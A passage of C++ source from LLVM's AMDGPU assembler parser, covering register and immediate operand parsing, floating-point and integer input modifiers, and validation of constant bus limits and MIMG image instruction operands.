auto Loc = getLoc();
const RegInfo *RI = getRegularRegInfo(RegName);
if (!RI) {
Error(Loc, "invalid register name");
return AMDGPU::NoRegister;
}
Tokens.push_back(getToken());
lex(); // skip register name
RegKind = RI->Kind;
StringRef RegSuffix = RegName.substr(RI->Name.size());
if (!RegSuffix.empty()) {
// Single 32-bit register: vXX.
if (!getRegNum(RegSuffix, RegNum)) {
Error(Loc, "invalid register index");
return AMDGPU::NoRegister;
}
RegWidth = 1;
} else {
// Range of registers: v[XX:YY]. ":YY" is optional.
if (!ParseRegRange(RegNum, RegWidth))
return AMDGPU::NoRegister;
}
return getRegularReg(RegKind, RegNum, RegWidth, Loc);
}
unsigned AMDGPUAsmParser::ParseRegList(RegisterKind &RegKind, unsigned &RegNum,
unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens) {
unsigned Reg = AMDGPU::NoRegister;
auto ListLoc = getLoc();
if (!skipToken(AsmToken::LBrac,
"expected a register or a list of registers")) {
return AMDGPU::NoRegister;
}
// List of consecutive registers, e.g.: [s0,s1,s2,s3]
auto Loc = getLoc();
if (!ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth))
return AMDGPU::NoRegister;
if (RegWidth != 1) {
Error(Loc, "expected a single 32-bit register");
return AMDGPU::NoRegister;
}
for (; trySkipToken(AsmToken::Comma); ) {
RegisterKind NextRegKind;
unsigned NextReg, NextRegNum, NextRegWidth;
Loc = getLoc();
if (!ParseAMDGPURegister(NextRegKind, NextReg,
NextRegNum, NextRegWidth,
Tokens)) {
return AMDGPU::NoRegister;
}
if (NextRegWidth != 1) {
Error(Loc, "expected a single 32-bit register");
return AMDGPU::NoRegister;
}
if (NextRegKind != RegKind) {
Error(Loc, "registers in a list must be of the same kind");
return AMDGPU::NoRegister;
}
if (!AddNextRegisterToList(Reg, RegWidth, RegKind, NextReg, Loc))
return AMDGPU::NoRegister;
}
if (!skipToken(AsmToken::RBrac,
"expected a comma or a closing square bracket")) {
return AMDGPU::NoRegister;
}
if (isRegularReg(RegKind))
Reg = getRegularReg(RegKind, RegNum, RegWidth, ListLoc);
return Reg;
}
bool AMDGPUAsmParser::ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens) {
auto Loc = getLoc();
Reg = AMDGPU::NoRegister;
if (isToken(AsmToken::Identifier)) {
Reg = ParseSpecialReg(RegKind, RegNum, RegWidth, Tokens);
if (Reg == AMDGPU::NoRegister)
Reg = ParseRegularReg(RegKind, RegNum, RegWidth, Tokens);
} else {
Reg = ParseRegList(RegKind, RegNum, RegWidth, Tokens);
}
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
if (Reg == AMDGPU::NoRegister) {
assert(Parser.hasPendingError());
return false;
}
if (!subtargetHasRegister(*TRI, Reg)) {
if (Reg == AMDGPU::SGPR_NULL) {
Error(Loc, "'null' operand is not supported on this GPU");
} else {
Error(Loc, "register not available on this GPU");
}
return false;
}
return true;
}
bool AMDGPUAsmParser::ParseAMDGPURegister(RegisterKind &RegKind, unsigned &Reg,
unsigned &RegNum, unsigned &RegWidth,
bool RestoreOnFailure /*=false*/) {
Reg = AMDGPU::NoRegister;
SmallVector<AsmToken, 1> Tokens;
if (ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth, Tokens)) {
if (RestoreOnFailure) {
while (!Tokens.empty()) {
getLexer().UnLex(Tokens.pop_back_val());
}
}
return true;
}
return false;
}
Optional<StringRef>
AMDGPUAsmParser::getGprCountSymbolName(RegisterKind RegKind) {
switch (RegKind) {
case IS_VGPR:
return StringRef(".amdgcn.next_free_vgpr");
case IS_SGPR:
return StringRef(".amdgcn.next_free_sgpr");
default:
return None;
}
}
void AMDGPUAsmParser::initializeGprCountSymbol(RegisterKind RegKind) {
auto SymbolName = getGprCountSymbolName(RegKind);
assert(SymbolName && "initializing invalid register kind");
MCSymbol *Sym = getContext().getOrCreateSymbol(*SymbolName);
Sym->setVariableValue(MCConstantExpr::create(0, getContext()));
}
bool AMDGPUAsmParser::updateGprCountSymbols(RegisterKind RegKind,
unsigned DwordRegIndex,
unsigned RegWidth) {
// Symbols are only defined for GCN targets
if (AMDGPU::getIsaVersion(getSTI().getCPU()).Major < 6)
return true;
auto SymbolName = getGprCountSymbolName(RegKind);
if (!SymbolName)
return true;
MCSymbol *Sym = getContext().getOrCreateSymbol(*SymbolName);
int64_t NewMax = DwordRegIndex + RegWidth - 1;
int64_t OldCount;
if (!Sym->isVariable())
return !Error(getLoc(),
".amdgcn.next_free_{v,s}gpr symbols must be variable");
if (!Sym->getVariableValue(false)->evaluateAsAbsolute(OldCount))
return !Error(
getLoc(),
".amdgcn.next_free_{v,s}gpr symbols must be absolute expressions");
if (OldCount <= NewMax)
Sym->setVariableValue(MCConstantExpr::create(NewMax + 1, getContext()));
return true;
}
std::unique_ptr<AMDGPUOperand>
AMDGPUAsmParser::parseRegister(bool RestoreOnFailure) {
const auto &Tok = getToken();
SMLoc StartLoc = Tok.getLoc();
SMLoc EndLoc = Tok.getEndLoc();
RegisterKind RegKind;
unsigned Reg, RegNum, RegWidth;
if (!ParseAMDGPURegister(RegKind, Reg, RegNum, RegWidth)) {
return nullptr;
}
if (isHsaAbiVersion3AndAbove(&getSTI())) {
if (!updateGprCountSymbols(RegKind, RegNum, RegWidth))
return nullptr;
} else
KernelScope.usesRegister(RegKind, RegNum, RegWidth);
return AMDGPUOperand::CreateReg(this, Reg, StartLoc, EndLoc);
}
OperandMatchResultTy
AMDGPUAsmParser::parseImm(OperandVector &Operands, bool HasSP3AbsModifier) {
// TODO: add syntactic sugar for 1/(2*PI)
assert(!isRegister());
assert(!isModifier());
const auto& Tok = getToken();
const auto& NextTok = peekToken();
bool IsReal = Tok.is(AsmToken::Real);
SMLoc S = getLoc();
bool Negate = false;
if (!IsReal && Tok.is(AsmToken::Minus) && NextTok.is(AsmToken::Real)) {
lex();
IsReal = true;
Negate = true;
}
if (IsReal) {
// Floating-point expressions are not supported.
// Can only allow floating-point literals with an
// optional sign.
StringRef Num = getTokenStr();
lex();
APFloat RealVal(APFloat::IEEEdouble());
auto roundMode = APFloat::rmNearestTiesToEven;
if (errorToBool(RealVal.convertFromString(Num, roundMode).takeError())) {
return MatchOperand_ParseFail;
}
if (Negate)
RealVal.changeSign();
Operands.push_back(
AMDGPUOperand::CreateImm(this, RealVal.bitcastToAPInt().getZExtValue(), S,
AMDGPUOperand::ImmTyNone, true));
return MatchOperand_Success;
} else {
int64_t IntVal;
const MCExpr *Expr;
SMLoc S = getLoc();
if (HasSP3AbsModifier) {
// This is a workaround for handling expressions
// as arguments of SP3 'abs' modifier, for example:
// |1.0|
// |-1|
// |1+x|
// This syntax is not compatible with syntax of standard
// MC expressions (due to the trailing '|').
SMLoc EndLoc;
if (getParser().parsePrimaryExpr(Expr, EndLoc, nullptr))
return MatchOperand_ParseFail;
} else {
if (Parser.parseExpression(Expr))
return MatchOperand_ParseFail;
}
if (Expr->evaluateAsAbsolute(IntVal)) {
Operands.push_back(AMDGPUOperand::CreateImm(this, IntVal, S));
} else {
Operands.push_back(AMDGPUOperand::CreateExpr(this, Expr, S));
}
return MatchOperand_Success;
}
return MatchOperand_NoMatch;
}
OperandMatchResultTy
AMDGPUAsmParser::parseReg(OperandVector &Operands) {
if (!isRegister())
return MatchOperand_NoMatch;
if (auto R = parseRegister()) {
assert(R->isReg());
Operands.push_back(std::move(R));
return MatchOperand_Success;
}
return MatchOperand_ParseFail;
}
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImm(OperandVector &Operands, bool HasSP3AbsMod) {
auto res = parseReg(Operands);
if (res != MatchOperand_NoMatch) {
return res;
} else if (isModifier()) {
return MatchOperand_NoMatch;
} else {
return parseImm(Operands, HasSP3AbsMod);
}
}
bool
AMDGPUAsmParser::isNamedOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
if (Token.is(AsmToken::Identifier) && NextToken.is(AsmToken::LParen)) {
const auto &str = Token.getString();
return str == "abs" || str == "neg" || str == "sext";
}
return false;
}
bool
AMDGPUAsmParser::isOpcodeModifierWithVal(const AsmToken &Token, const AsmToken &NextToken) const {
return Token.is(AsmToken::Identifier) && NextToken.is(AsmToken::Colon);
}
bool
AMDGPUAsmParser::isOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
return isNamedOperandModifier(Token, NextToken) || Token.is(AsmToken::Pipe);
}
bool
AMDGPUAsmParser::isRegOrOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
return isRegister(Token, NextToken) || isOperandModifier(Token, NextToken);
}
// Check if this is an operand modifier or an opcode modifier
// which may look like an expression but it is not. We should
// avoid parsing these modifiers as expressions. Currently
// recognized sequences are:
// |...|
// abs(...)
// neg(...)
// sext(...)
// -reg
// -|...|
// -abs(...)
// name:...
// Note that simple opcode modifiers like 'gds' may be parsed as
// expressions; this is a special case. See getExpressionAsToken.
//
bool
AMDGPUAsmParser::isModifier() {
AsmToken Tok = getToken();
AsmToken NextToken[2];
peekTokens(NextToken);
return isOperandModifier(Tok, NextToken[0]) ||
(Tok.is(AsmToken::Minus) && isRegOrOperandModifier(NextToken[0], NextToken[1])) ||
isOpcodeModifierWithVal(Tok, NextToken[0]);
}
// Check if the current token is an SP3 'neg' modifier.
// Currently this modifier is allowed in the following context:
//
// 1. Before a register, e.g. "-v0", "-v[...]" or "-[v0,v1]".
// 2. Before an 'abs' modifier: -abs(...)
// 3. Before an SP3 'abs' modifier: -|...|
//
// In all other cases "-" is handled as a part
// of an expression that follows the sign.
//
// Note: When "-" is followed by an integer literal,
// this is interpreted as integer negation rather
// than a floating-point NEG modifier applied to N.
// Beside being contr-intuitive, such use of floating-point
// NEG modifier would have resulted in different meaning
// of integer literals used with VOP1/2/C and VOP3,
// for example:
// v_exp_f32_e32 v5, -1 // VOP1: src0 = 0xFFFFFFFF
// v_exp_f32_e64 v5, -1 // VOP3: src0 = 0x80000001
// Negative fp literals with preceding "-" are
// handled likewise for uniformity
//
bool
AMDGPUAsmParser::parseSP3NegModifier() {
AsmToken NextToken[2];
peekTokens(NextToken);
if (isToken(AsmToken::Minus) &&
(isRegister(NextToken[0], NextToken[1]) ||
NextToken[0].is(AsmToken::Pipe) ||
isId(NextToken[0], "abs"))) {
lex();
return true;
}
return false;
}
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImmWithFPInputMods(OperandVector &Operands,
bool AllowImm) {
bool Neg, SP3Neg;
bool Abs, SP3Abs;
SMLoc Loc;
// Disable ambiguous constructs like '--1' etc. Should use neg(-1) instead.
if (isToken(AsmToken::Minus) && peekToken().is(AsmToken::Minus)) {
Error(getLoc(), "invalid syntax, expected 'neg' modifier");
return MatchOperand_ParseFail;
}
SP3Neg = parseSP3NegModifier();
Loc = getLoc();
Neg = trySkipId("neg");
if (Neg && SP3Neg) {
Error(Loc, "expected register or immediate");
return MatchOperand_ParseFail;
}
if (Neg && !skipToken(AsmToken::LParen, "expected left paren after neg"))
return MatchOperand_ParseFail;
Abs = trySkipId("abs");
if (Abs && !skipToken(AsmToken::LParen, "expected left paren after abs"))
return MatchOperand_ParseFail;
Loc = getLoc();
SP3Abs = trySkipToken(AsmToken::Pipe);
if (Abs && SP3Abs) {
Error(Loc, "expected register or immediate");
return MatchOperand_ParseFail;
}
OperandMatchResultTy Res;
if (AllowImm) {
Res = parseRegOrImm(Operands, SP3Abs);
} else {
Res = parseReg(Operands);
}
if (Res != MatchOperand_Success) {
return (SP3Neg || Neg || SP3Abs || Abs)? MatchOperand_ParseFail : Res;
}
if (SP3Abs && !skipToken(AsmToken::Pipe, "expected vertical bar"))
return MatchOperand_ParseFail;
if (Abs && !skipToken(AsmToken::RParen, "expected closing parentheses"))
return MatchOperand_ParseFail;
if (Neg && !skipToken(AsmToken::RParen, "expected closing parentheses"))
return MatchOperand_ParseFail;
AMDGPUOperand::Modifiers Mods;
Mods.Abs = Abs || SP3Abs;
Mods.Neg = Neg || SP3Neg;
if (Mods.hasFPModifiers()) {
AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands.back());
if (Op.isExpr()) {
Error(Op.getStartLoc(), "expected an absolute expression");
return MatchOperand_ParseFail;
}
Op.setModifiers(Mods);
}
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImmWithIntInputMods(OperandVector &Operands,
bool AllowImm) {
bool Sext = trySkipId("sext");
if (Sext && !skipToken(AsmToken::LParen, "expected left paren after sext"))
return MatchOperand_ParseFail;
OperandMatchResultTy Res;
if (AllowImm) {
Res = parseRegOrImm(Operands);
} else {
Res = parseReg(Operands);
}
if (Res != MatchOperand_Success) {
return Sext? MatchOperand_ParseFail : Res;
}
if (Sext && !skipToken(AsmToken::RParen, "expected closing parentheses"))
return MatchOperand_ParseFail;
AMDGPUOperand::Modifiers Mods;
Mods.Sext = Sext;
if (Mods.hasIntModifiers()) {
AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands.back());
if (Op.isExpr()) {
Error(Op.getStartLoc(), "expected an absolute expression");
return MatchOperand_ParseFail;
}
Op.setModifiers(Mods);
}
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseRegWithFPInputMods(OperandVector &Operands) {
return parseRegOrImmWithFPInputMods(Operands, false);
}
OperandMatchResultTy
AMDGPUAsmParser::parseRegWithIntInputMods(OperandVector &Operands) {
return parseRegOrImmWithIntInputMods(Operands, false);
}
OperandMatchResultTy AMDGPUAsmParser::parseVReg32OrOff(OperandVector &Operands) {
auto Loc = getLoc();
if (trySkipId("off")) {
Operands.push_back(AMDGPUOperand::CreateImm(this, 0, Loc,
AMDGPUOperand::ImmTyOff, false));
return MatchOperand_Success;
}
if (!isRegister())
return MatchOperand_NoMatch;
std::unique_ptr<AMDGPUOperand> Reg = parseRegister();
if (Reg) {
Operands.push_back(std::move(Reg));
return MatchOperand_Success;
}
return MatchOperand_ParseFail;
}
unsigned AMDGPUAsmParser::checkTargetMatchPredicate(MCInst &Inst) {
uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
if ((getForcedEncodingSize() == 32 && (TSFlags & SIInstrFlags::VOP3)) ||
(getForcedEncodingSize() == 64 && !(TSFlags & SIInstrFlags::VOP3)) ||
(isForcedDPP() && !(TSFlags & SIInstrFlags::DPP)) ||
(isForcedSDWA() && !(TSFlags & SIInstrFlags::SDWA)) )
return Match_InvalidOperand;
if ((TSFlags & SIInstrFlags::VOP3) &&
(TSFlags & SIInstrFlags::VOPAsmPrefer32Bit) &&
getForcedEncodingSize() != 64)
return Match_PreferE32;
if (Inst.getOpcode() == AMDGPU::V_MAC_F32_sdwa_vi ||
Inst.getOpcode() == AMDGPU::V_MAC_F16_sdwa_vi) {
// v_mac_f32/16 allow only dst_sel == DWORD;
auto OpNum =
AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::dst_sel);
const auto &Op = Inst.getOperand(OpNum);
if (!Op.isImm() || Op.getImm() != AMDGPU::SDWA::SdwaSel::DWORD) {
return Match_InvalidOperand;
}
}
return Match_Success;
}
static ArrayRef<unsigned> getAllVariants() {
static const unsigned Variants[] = {
AMDGPUAsmVariants::DEFAULT, AMDGPUAsmVariants::VOP3,
AMDGPUAsmVariants::SDWA, AMDGPUAsmVariants::SDWA9, AMDGPUAsmVariants::DPP
};
return makeArrayRef(Variants);
}
// What asm variants we should check
ArrayRef<unsigned> AMDGPUAsmParser::getMatchedVariants() const {
if (getForcedEncodingSize() == 32) {
static const unsigned Variants[] = {AMDGPUAsmVariants::DEFAULT};
return makeArrayRef(Variants);
}
if (isForcedVOP3()) {
static const unsigned Variants[] = {AMDGPUAsmVariants::VOP3};
return makeArrayRef(Variants);
}
if (isForcedSDWA()) {
static const unsigned Variants[] = {AMDGPUAsmVariants::SDWA,
AMDGPUAsmVariants::SDWA9};
return makeArrayRef(Variants);
}
if (isForcedDPP()) {
static const unsigned Variants[] = {AMDGPUAsmVariants::DPP};
return makeArrayRef(Variants);
}
return getAllVariants();
}
StringRef AMDGPUAsmParser::getMatchedVariantName() const {
if (getForcedEncodingSize() == 32)
return "e32";
if (isForcedVOP3())
return "e64";
if (isForcedSDWA())
return "sdwa";
if (isForcedDPP())
return "dpp";
return "";
}
unsigned AMDGPUAsmParser::findImplicitSGPRReadInVOP(const MCInst &Inst) const {
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
const unsigned Num = Desc.getNumImplicitUses();
for (unsigned i = 0; i < Num; ++i) {
unsigned Reg = Desc.ImplicitUses[i];
switch (Reg) {
case AMDGPU::FLAT_SCR:
case AMDGPU::VCC:
case AMDGPU::VCC_LO:
case AMDGPU::VCC_HI:
case AMDGPU::M0:
return Reg;
default:
break;
}
}
return AMDGPU::NoRegister;
}
// NB: This code is correct only when used to check constant
// bus limitations because GFX7 support no f16 inline constants.
// Note that there are no cases when a GFX7 opcode violates
// constant bus limitations due to the use of an f16 constant.
bool AMDGPUAsmParser::isInlineConstant(const MCInst &Inst,
unsigned OpIdx) const {
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
if (!AMDGPU::isSISrcOperand(Desc, OpIdx)) {
return false;
}
const MCOperand &MO = Inst.getOperand(OpIdx);
int64_t Val = MO.getImm();
auto OpSize = AMDGPU::getOperandSize(Desc, OpIdx);
switch (OpSize) { // expected operand size
case 8:
return AMDGPU::isInlinableLiteral64(Val, hasInv2PiInlineImm());
case 4:
return AMDGPU::isInlinableLiteral32(Val, hasInv2PiInlineImm());
case 2: {
const unsigned OperandType = Desc.OpInfo[OpIdx].OperandType;
if (OperandType == AMDGPU::OPERAND_REG_IMM_INT16 ||
OperandType == AMDGPU::OPERAND_REG_INLINE_C_INT16 ||
OperandType == AMDGPU::OPERAND_REG_INLINE_AC_INT16)
return AMDGPU::isInlinableIntLiteral(Val);
if (OperandType == AMDGPU::OPERAND_REG_INLINE_C_V2INT16 ||
OperandType == AMDGPU::OPERAND_REG_INLINE_AC_V2INT16 ||
OperandType == AMDGPU::OPERAND_REG_IMM_V2INT16)
return AMDGPU::isInlinableIntLiteralV216(Val);
if (OperandType == AMDGPU::OPERAND_REG_INLINE_C_V2FP16 ||
OperandType == AMDGPU::OPERAND_REG_INLINE_AC_V2FP16 ||
OperandType == AMDGPU::OPERAND_REG_IMM_V2FP16)
return AMDGPU::isInlinableLiteralV216(Val, hasInv2PiInlineImm());
return AMDGPU::isInlinableLiteral16(Val, hasInv2PiInlineImm());
}
default:
llvm_unreachable("invalid operand size");
}
}
unsigned AMDGPUAsmParser::getConstantBusLimit(unsigned Opcode) const {
if (!isGFX10Plus())
return 1;
switch (Opcode) {
// 64-bit shift instructions can use only one scalar value input
case AMDGPU::V_LSHLREV_B64_e64:
case AMDGPU::V_LSHLREV_B64_gfx10:
case AMDGPU::V_LSHRREV_B64_e64:
case AMDGPU::V_LSHRREV_B64_gfx10:
case AMDGPU::V_ASHRREV_I64_e64:
case AMDGPU::V_ASHRREV_I64_gfx10:
case AMDGPU::V_LSHL_B64_e64:
case AMDGPU::V_LSHR_B64_e64:
case AMDGPU::V_ASHR_I64_e64:
return 1;
default:
return 2;
}
}
bool AMDGPUAsmParser::usesConstantBus(const MCInst &Inst, unsigned OpIdx) {
const MCOperand &MO = Inst.getOperand(OpIdx);
if (MO.isImm()) {
return !isInlineConstant(Inst, OpIdx);
} else if (MO.isReg()) {
auto Reg = MO.getReg();
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
auto PReg = mc2PseudoReg(Reg);
return isSGPR(PReg, TRI) && PReg != SGPR_NULL;
} else {
return true;
}
}
bool
AMDGPUAsmParser::validateConstantBusLimitations(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opcode = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opcode);
unsigned LastSGPR = AMDGPU::NoRegister;
unsigned ConstantBusUseCount = 0;
unsigned NumLiterals = 0;
unsigned LiteralSize;
if (Desc.TSFlags &
(SIInstrFlags::VOPC |
SIInstrFlags::VOP1 | SIInstrFlags::VOP2 |
SIInstrFlags::VOP3 | SIInstrFlags::VOP3P |
SIInstrFlags::SDWA)) {
// Check special imm operands (used by madmk, etc)
if (AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::imm) != -1) {
++NumLiterals;
LiteralSize = 4;
}
SmallDenseSet<unsigned> SGPRsUsed;
unsigned SGPRUsed = findImplicitSGPRReadInVOP(Inst);
if (SGPRUsed != AMDGPU::NoRegister) {
SGPRsUsed.insert(SGPRUsed);
++ConstantBusUseCount;
}
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);
const int OpIndices[] = { Src0Idx, Src1Idx, Src2Idx };
for (int OpIdx : OpIndices) {
if (OpIdx == -1) break;
const MCOperand &MO = Inst.getOperand(OpIdx);
if (usesConstantBus(Inst, OpIdx)) {
if (MO.isReg()) {
LastSGPR = mc2PseudoReg(MO.getReg());
// Pairs of registers with a partial intersections like these
// s0, s[0:1]
// flat_scratch_lo, flat_scratch
// flat_scratch_lo, flat_scratch_hi
// are theoretically valid but they are disabled anyway.
// Note that this code mimics SIInstrInfo::verifyInstruction
if (!SGPRsUsed.count(LastSGPR)) {
SGPRsUsed.insert(LastSGPR);
++ConstantBusUseCount;
}
} else { // Expression or a literal
if (Desc.OpInfo[OpIdx].OperandType == MCOI::OPERAND_IMMEDIATE)
continue; // special operand like VINTERP attr_chan
// An instruction may use only one literal.
// This has been validated on the previous step.
// See validateVOPLiteral.
// This literal may be used as more than one operand.
// If all these operands are of the same size,
// this literal counts as one scalar value.
// Otherwise it counts as 2 scalar values.
// See "GFX10 Shader Programming", section 3.6.2.3.
unsigned Size = AMDGPU::getOperandSize(Desc, OpIdx);
if (Size < 4) Size = 4;
if (NumLiterals == 0) {
NumLiterals = 1;
LiteralSize = Size;
} else if (LiteralSize != Size) {
NumLiterals = 2;
}
}
}
}
}
ConstantBusUseCount += NumLiterals;
if (ConstantBusUseCount <= getConstantBusLimit(Opcode))
return true;
SMLoc LitLoc = getLitLoc(Operands);
SMLoc RegLoc = getRegLoc(LastSGPR, Operands);
SMLoc Loc = (LitLoc.getPointer() < RegLoc.getPointer()) ? RegLoc : LitLoc;
Error(Loc, "invalid operand (violates constant bus restrictions)");
return false;
}
bool
AMDGPUAsmParser::validateEarlyClobberLimitations(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opcode = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opcode);
const int DstIdx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::vdst);
if (DstIdx == -1 ||
Desc.getOperandConstraint(DstIdx, MCOI::EARLY_CLOBBER) == -1) {
return true;
}
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);
assert(DstIdx != -1);
const MCOperand &Dst = Inst.getOperand(DstIdx);
assert(Dst.isReg());
const int SrcIndices[] = { Src0Idx, Src1Idx, Src2Idx };
for (int SrcIdx : SrcIndices) {
if (SrcIdx == -1) break;
const MCOperand &Src = Inst.getOperand(SrcIdx);
if (Src.isReg()) {
if (TRI->regsOverlap(Dst.getReg(), Src.getReg())) {
const unsigned SrcReg = mc2PseudoReg(Src.getReg());
Error(getRegLoc(SrcReg, Operands),
"destination must be different than all sources");
return false;
}
}
}
return true;
}
bool AMDGPUAsmParser::validateIntClampSupported(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::IntClamp) != 0 && !hasIntClamp()) {
int ClampIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp);
assert(ClampIdx != -1);
return Inst.getOperand(ClampIdx).getImm() == 0;
}
return true;
}
bool AMDGPUAsmParser::validateMIMGDataSize(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
int VDataIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vdata);
int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
int TFEIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::tfe);
assert(VDataIdx != -1);
if (DMaskIdx == -1 || TFEIdx == -1) // intersect_ray
return true;
unsigned VDataSize = AMDGPU::getRegOperandSize(getMRI(), Desc, VDataIdx);
unsigned TFESize = (TFEIdx != -1 && Inst.getOperand(TFEIdx).getImm()) ? 1 : 0;
unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;
if (DMask == 0)
DMask = 1;
unsigned DataSize =
(Desc.TSFlags & SIInstrFlags::Gather4) ? 4 : countPopulation(DMask);
if (hasPackedD16()) {
int D16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::d16);
if (D16Idx >= 0 && Inst.getOperand(D16Idx).getImm())
DataSize = (DataSize + 1) / 2;
}
return (VDataSize / 4) == DataSize + TFESize;
}
bool AMDGPUAsmParser::validateMIMGAddrSize(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0 || !isGFX10Plus())
return true;
const AMDGPU::MIMGInfo *Info = AMDGPU::getMIMGInfo(Opc);
const AMDGPU::MIMGBaseOpcodeInfo *BaseOpcode =
AMDGPU::getMIMGBaseOpcodeInfo(Info->BaseOpcode);
int VAddr0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vaddr0);
int SrsrcIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::srsrc);
int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
int A16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::a16);
assert(VAddr0Idx != -1);
assert(SrsrcIdx != -1);
assert(SrsrcIdx > VAddr0Idx);
if (DimIdx == -1)
return true; // intersect_ray
unsigned Dim = Inst.getOperand(DimIdx).getImm();
const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByEncoding(Dim);
bool IsNSA = SrsrcIdx - VAddr0Idx > 1;
unsigned ActualAddrSize =
IsNSA ? SrsrcIdx - VAddr0Idx
: AMDGPU::getRegOperandSize(getMRI(), Desc, VAddr0Idx) / 4;
bool IsA16 = (A16Idx != -1 && Inst.getOperand(A16Idx).getImm());
unsigned ExpectedAddrSize =
AMDGPU::getAddrSizeMIMGOp(BaseOpcode, DimInfo, IsA16, hasG16());
if (!IsNSA) {
if (ExpectedAddrSize > 8)
ExpectedAddrSize = 16;
// Allow oversized 8 VGPR vaddr when only 5/6/7 VGPRs are required.
// This provides backward compatibility for assembly created
// before 160b/192b/224b types were directly supported.
if (ActualAddrSize == 8 && (ExpectedAddrSize >= 5 && ExpectedAddrSize <= 7))
return true;
}
return ActualAddrSize == ExpectedAddrSize;
}
bool AMDGPUAsmParser::validateMIMGAtomicDMask(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
if (!Desc.mayLoad() || !Desc.mayStore())
return true; // Not atomic
int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;
// This is an incomplete check because image_atomic_cmpswap
// may only use 0x3 and 0xf while other atomic operations
// may use 0x1 and 0x3. However these limitations are
// verified when we check that dmask matches dst size.
return DMask == 0x1 || DMask == 0x3 || DMask == 0xf;
}
bool AMDGPUAsmParser::validateMIMGGatherDMask(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::Gather4) == 0)
return true;
int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;
// GATHER4 instructions use dmask in a different fashion compared to
// other MIMG instructions. The only useful DMASK values are
// 1=red, 2=green, 4=blue, 8=alpha. (e.g. 1 returns
// (red,red,red,red) etc.) The ISA document doesn't mention
// this.
return DMask == 0x1 || DMask == 0x2 || DMask == 0x4 || DMask == 0x8;
}
bool AMDGPUAsmParser::validateMIMGMSAA(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
const AMDGPU::MIMGInfo *Info = AMDGPU::getMIMGInfo(Opc);
const AMDGPU::MIMGBaseOpcodeInfo *BaseOpcode =
AMDGPU::getMIMGBaseOpcodeInfo(Info->BaseOpcode);
if (!BaseOpcode->MSAA)
return true;
int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
assert(DimIdx != -1);
unsigned Dim = Inst.getOperand(DimIdx).getImm();
const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByEncoding(Dim);
return DimInfo->MSAA;
}
static bool IsMovrelsSDWAOpcode(const unsigned Opcode)
{
switch (Opcode) {
